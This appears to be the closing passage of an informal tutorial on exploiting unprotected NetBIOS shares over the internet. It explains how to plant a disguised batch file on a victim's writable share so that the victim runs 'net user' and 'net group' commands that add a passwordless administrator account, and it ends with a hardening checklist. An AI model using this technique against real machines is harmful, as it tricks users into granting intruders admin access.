Play around with the Essential Net Tools application, as it is a hell of a lot more than it may first appear to be…..you can use it to sniff data similar to the way Ethereal does……hmmmm, could we use that by making it connect to something that needs a share password…….

If we so wanted to, we could connect to the printer shares in the same way we connect to a networked printer on our own LAN and print things out. However we are all a touch more mature than this here aren’t we, so we won’t entertain that idea.

Is there anything else we can do with these shares….of course there is.
If you think about it you have a full and unrestricted TCP connection to another computer – who just happens to trust you from a shared resource point of view.

If we have write privileges we can drop any file we choose in the shared drive. Some of the more astute of you may think about dropping a command prompt or making a quick .bat file to spawn a command prompt and start issuing some

[code]net user TAZ /ADD[/code]

Commands followed by some

[code]net group "Administrators" TAZ /ADD[/code]

However this will not work if you run the command prompt yourself – you will end up adding an administrative user account called TAZ to your own computer.

What if we make a cleverly named batch file for the unsuspecting user to run though……..

If the user has admin rights on the box it is run on, he will add an admin account called TAZ with no password to his PC…………due to the fact that all his shares are available to the internet, chances are that when he has run the batch file he won't have a clue what he has just done anyway!

Well, this "small" paper has run on much longer than I had planned, so I will end it here. There is an Advanced NetBIOS paper in the pipeline where we will look at defeating password protected shares, elevating our privileges, enumerating AD users and cracking their passwords.

In summary, I hope I have demonstrated exactly how easy it is to exploit an [b]unprotected[/b] NetBIOS share over the internet.
Remember, if you don’t want this to happen to you – make sure that if your PC [b]does[/b] meet all of the following requirements, you change at least one of them:

1. File and Printer Sharing for Microsoft Networks is installed as a network component (Network in Control Panel).
2. File and Printer Sharing for Microsoft Networks is bound to TCP/IP on an adapter used for the Internet.
3. Options for files and printers are checked (enabled) under File and Print Sharing.
4. “Share(s)” have actually been configured for file(s) and printer(s).
5. Strong passwords have not been used on file and printer “share(s).”
6. Scope ID has not been set like a strong password.
